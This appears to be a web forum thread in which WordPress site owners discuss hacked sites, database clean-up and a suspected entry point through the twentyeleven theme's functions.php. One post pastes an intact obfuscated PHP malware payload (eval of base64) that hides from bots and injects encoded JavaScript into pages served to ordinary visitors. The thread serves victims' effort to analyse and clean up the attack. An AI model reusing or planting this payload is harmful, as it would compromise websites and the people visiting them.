Anyone found the source of this exploit yet. It hit two of the 25 or so sites on my server so we fixed those up manually and updated their Wordpress versions. Like several of you, I've got multiple cPanels on a VPS and only one got hit. Is this a local Wordpress exploit. Or something that I should be concerned with for my entire server?
Maybe of interest to you guys but just out of curiosity I did a database dump of one of my WP sites and started looking through it. There is all sorts of crap in there from certain plugins/widgets that I installed. If I can remember the plugins i'll post it here. I am sure one of them was a tag cloud plugin. I have since deleted the plugins and cleaned up the database.
Can any of you help me decode the following and explain step by step how do you decode it? Especially the last part with the javascript code: eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFppaDNhVzVrYjNkYkltUnZZM1Z0Wlc1MElsMHBkSEo1ZTNCeWIzUnZkSGx3WlR0OVkyRjBZMmdvWW5KbFluSXBlM04wUFZOMGNtbHVaenQ2ZWowbllXd25PM3A2UFNkNmRpY3VjM1ZpYzNSeUtERXlNeTB4TWpJcEszcDZPM056UFZ0ZE8yWTlKMlp5SnlzbmIyMG5LeWREYUNjN1ppczlKMkZ5UXljN1ppczlKM0ZuYjJSbEoxc2ljM1ZpYzNSeUlsMG9OQzB5S1R0M1BYUm9hWE03WlQxM1cyWmJJbk4xWW5OMGNpSmRLREV4S1N0NmVsMDdiajBpTXk0MUl6TXVOU00xTVM0MUl6VXdJekUxSXpFNUl6UTVJelUwTGpVak5EZ3VOU00xTnk0MUl6VXpMalVqTkRrdU5TTTFOQ00xTnlNeU1pTTFNQzQxSXpRNUxqVWpOVGNqTXpNdU5TTTFNeU0wT1M0MUl6VXpMalVqTkRrdU5TTTFOQ00xTnlNMU5pNDFJek15SXpVNUxqVWpOREVqTkRjdU5TTTFNQzQxSXpNNEl6UTNMalVqTlRNdU5TTTBPUzQxSXpFNUl6RTRMalVqTkRnak5UUXVOU00wT1NNMU9TNDFJekU0TGpVak1Ua3VOU00wTkM0MUl6SXpJelExTGpVak1Ua3VOU00yTUM0MUl6VXVOU016TGpVak15NDFJek11TlNNMU1TNDFJelV3SXpVMkl6UTNMalVqTlRNdU5TTTBPUzQxSXpVMkl6RTVJekU1TGpVak1qZ3VOU00xTGpVak15NDFJek11TlNNMk1TNDFJekUxSXpRNUxqVWpOVE1qTlRZdU5TTTBPUzQxSXpFMUl6WXdMalVqTlM0MUl6TXVOU016TGpVak15NDFJelE1SXpVMExqVWpORGd1TlNNMU55NDFJelV6TGpVak5Ea3VOU00xTkNNMU55TXlNaU0xT0M0MUl6VTJJelV4TGpVak5UY2pORGt1TlNNeE9TTXhOaU15T1NNMU1TNDFJelV3SXpVMkl6UTNMalVqTlRNdU5TTTBPUzQxSXpFMUl6VTJMalVqTlRZak5EZ3VOU015T1M0MUl6RTRMalVqTlRFak5UY2pOVGNqTlRVak1qZ2pNakl1TlNNeU1pNDFJelU0TGpVak5UTXVOU00xTlM0MUl6VXlJelUySXpVM0l6WXdJelV4SXpVNEl6VTRMalVqTWpJak5URXVOU00xTUM0MUl6VXdMalVqTWpJak5EZ2pOVEV1TlNNMk1DTXlNaTQxSXpRNUl6SXlMalVqTWpVak1qTWpNalVqTWpJak5UVWpOVEVqTlRVak16QXVOU00xTUM0MUl6VTBMalVqTWprdU5TTXlNeTQxSXpFNExqVWpNVFVqTlRndU5TTTFNUzQxSXpRNUl6VTNJelV4SXpJNUxqVWpNVGd1TlNNeU15NDFJekl6SXpFNExqVWpNVFVqTlRFak5Ea3VOU00xTVM0MUl6VXdMalVqTlRFak5UY2pNamt1TlNNeE9DNDFJekl6TGpVak1qTWpNVGd1TlNNeE5TTTFOaTQxSXpVM0l6VTVMalVqTlRNak5Ea3VOU015T1M0MUl6RTRMalVqTlRnak5URXVOU00xTmk0MUl6VXhMalVqTkRnak5URXVOU00xTXlNMU1TNDFJelUzSXpVNUxqVWpNamdqTlRFak5URXVOU00wT1NNME9TTTBPUzQxSXpVMEl6STRMalVqTlRVak5UUXVOU00xTmk0MUl6VXhMalVqTlRjak5URXVOU00xTkM0MUl6VTBJekk0SXpRM0xqVWpORGdqTlRZdU5TTTFOQzQxSXpVekl6VTNMalVqTlRjak5Ea3VOU015T0M0MUl6VXpJelE1TGpVak5UQWpOVGNqTWpnak1qTWpNamd1TlNNMU55TTFOQzQxSXpVMUl6STRJekl6SXpJNExqVWpNVGd1TlNNek1DTXlPU015TWk0MUl6VXhMalVqTlRBak5UWWpORGN1TlNNMU15NDFJelE1TGpVak16QWpNVFlqTVRrdU5TTXlPQzQxSXpVdU5TTXpMalVqTXk0MUl6WXhMalVqTlM0MUl6TXVOU016TGpVak5UQWpOVGN1TlNNMU5DTTBPQzQxSXpVM0l6VXhMalVqTlRRdU5TTTFOQ014TlNNMU1TNDFJelV3SXpVMkl6UTNMalVqTlRNdU5TTTBPUzQxSXpVMkl6RTVJekU1TGpVak5qQXVOU00xTGpVak15NDFJek11TlNNekxqVWpOVGdqTkRjdU5TTTFOaU14TlNNMU1DTXhOU015T1M0MUl6RTFJelE1SXpVMExqVWpORGd1TlNNMU55NDFJelV6TGpVak5Ea3VOU00xTkNNMU55TXlNaU0wT0M0MUl6VTJJelE1TGpVak5EY3VOU00xTnlNME9TNDFJek16TGpVak5UTWpORGt1TlNNMU15NDFJelE1TGpVak5UUWpOVGNqTVRrak1UZ3VOU00xTVM0MUl6VXdJelUySXpRM0xqVWpOVE11TlNNME9TNDFJekU0TGpVak1Ua3VOU015T0M0MUl6VXdJekl5SXpVMkxqVWpORGt1TlNNMU55TXpNUzQxSXpVM0l6VTNJelUySXpVeExqVWpORGdqTlRjdU5TTTFOeU0wT1M0MUl6RTVJekU0TGpVak5UWXVOU00xTmlNME9DNDFJekU0TGpVak1qRWpNVGd1TlNNMU1TTTFOeU0xTnlNMU5TTXlPQ015TWk0MUl6SXlMalVqTlRndU5TTTFNeTQxSXpVMUxqVWpOVElqTlRZak5UY2pOakFqTlRFak5UZ2pOVGd1TlNNeU1pTTFNUzQxSXpVd0xqVWpOVEF1TlNNeU1pTTBPQ00xTVM0MUl6WXdJekl5TGpVak5Ea2pNakl1TlNNeU5TTXlNeU15TlNNeU1pTTFOU00xTVNNMU5TTXpNQzQxSXpVd0xqVWpOVFF1TlNNeU9TNDFJekl6TGpVak1UZ3VOU014T1M0MUl6STRMalVqTlRBak1qSWpOVFl1TlNNMU55TTFPUzQxSXpVekl6UTVMalVqTWpJak5UZ2pOVEV1TlNNMU5pNDFJelV4TGpVak5EZ2pOVEV1TlNNMU15TTFNUzQxSXpVM0l6VTVMalVqTWprdU5TTXhPQzQxSXpVeEl6VXhMalVqTkRrak5Ea2pORGt1TlNNMU5DTXhPQzQxSXpJNExqVWpOVEFqTWpJak5UWXVOU00xTnlNMU9TNDFJelV6SXpRNUxqVWpNaklqTlRVak5UUXVOU00xTmk0MUl6VXhMalVqTlRjak5URXVOU00xTkM0MUl6VTBJekk1TGpVak1UZ3VOU00wTnk0MUl6UTRJelUyTGpVak5UUXVOU00xTXlNMU55NDFJelUzSXpRNUxqVWpNVGd1TlNNeU9DNDFJelV3SXpJeUl6VTJMalVqTlRjak5Ua3VOU00xTXlNME9TNDFJekl5SXpVekl6UTVMalVqTlRBak5UY2pNamt1TlNNeE9DNDFJekl6SXpFNExqVWpNamd1TlNNMU1DTXlNaU0xTmk0MUl6VTNJelU1TGpVak5UTWpORGt1TlNNeU1pTTFOeU0xTkM0MUl6VTFJekk1TGpVak1UZ3VOU015TXlNeE9DNDFJekk0TGpVak5UQWpNaklqTlRZdU5TTTBPUzQxSXpVM0l6TXhMalVqTlRjak5UY2pOVFlqTlRFdU5TTTBPQ00xTnk0MUl6VTNJelE1TGpVak1Ua2pNVGd1TlNNMU9DNDFJelV4TGpVak5Ea2pOVGNqTlRFak1UZ3VOU015TVNNeE9DNDFJekl6TGpVak1qTWpNVGd1TlNNeE9TNDFJekk0TGpVak5UQWpNaklqTlRZdU5TTTBPUzQxSXpVM0l6TXhMalVqTlRjak5UY2pOVFlqTlRFdU5TTTBPQ00xTnk0MUl6VTNJelE1TGpVak1Ua2pNVGd1TlNNMU1TTTBPUzQxSXpVeExqVWpOVEF1TlNNMU1TTTFOeU14T0M0MUl6SXhJekU0TGpVak1qTXVOU015TXlNeE9DNDFJekU1TGpVak1qZ3VOU00xTGpVak15NDFJek11TlNNekxqVWpORGtqTlRRdU5TTTBPQzQxSXpVM0xqVWpOVE11TlNNME9TNDFJelUwSXpVM0l6SXlJelV3TGpVak5Ea3VOU00xTnlNek15NDFJelV6SXpRNUxqVWpOVE11TlNNME9TNDFJelUwSXpVM0l6VTJMalVqTXpJak5Ua3VOU00wTVNNME55NDFJelV3TGpVak16Z2pORGN1TlNNMU15NDFJelE1TGpVak1Ua2pNVGd1TlNNME9DTTFOQzQxSXpRNUl6VTVMalVqTVRndU5TTXhPUzQxSXpRMExqVWpNak1qTkRVdU5TTXlNaU0wTnk0MUl6VTFJelUxSXpRNUxqVWpOVFFqTkRrak16SXVOU00xTVNNMU1TNDFJelV6SXpRNUl6RTVJelV3SXpFNUxqVWpNamd1TlNNMUxqVWpNeTQxSXpNdU5TTTJNUzQxSWxzb0tHVXBQeUp6SWpvaUlpa3JJbkFpS3lKc2FYUWlYU2dpWVNNaVd5Z29aU2svSW5OMUlqb2lJaWtySW1KemRISWlYU2d4S1NrN2RISjVlM0U5Wkc5amRXMWxiblF1WTNKbFlYUmxSV3hsYldWdWRDZ2laR2wySWlrN2NTNWhjSEJsYm1SRGFHbHNaQ2h4S1R0OVkyRjBZMmdvY1hjcGUyZzlMWEJoY25ObFNXNTBLQ2N3TVRJbktTODFPMzBLWm05eUtHazlOaTB5TFRFdE1pMHhPMmt0TlRnNUlUMHdPMmtyS3lsN2FqMXBPMmxtS0hOMEtYTnpQWE56SzNOMExtWnliMjFEYUdGeVEyOWtaU2d0TVNwb0tpZ3hLekVxYmx0cVhTa3BPMzF4UFhOek8ybG1LR1VwWlNnaUlpdHhLVHQ5UEM5elkzSnBjSFErJykpOw0KfQ=='));
hi guys, one of my sites was also recently hacked with similar characteristics.. upon checking my logs it looks as if they got in via a POST request to functions.php in the twentyeleven theme. I only just discovered it, so not sure exactly how it was compromised as yet, but the first step seems to modify functions.php with a feedback check to see if they obtained access, then they modified the main index.php The twentyeleven theme was not even active either, so I've removed the twentyten & twentyeleven themes as a precaution.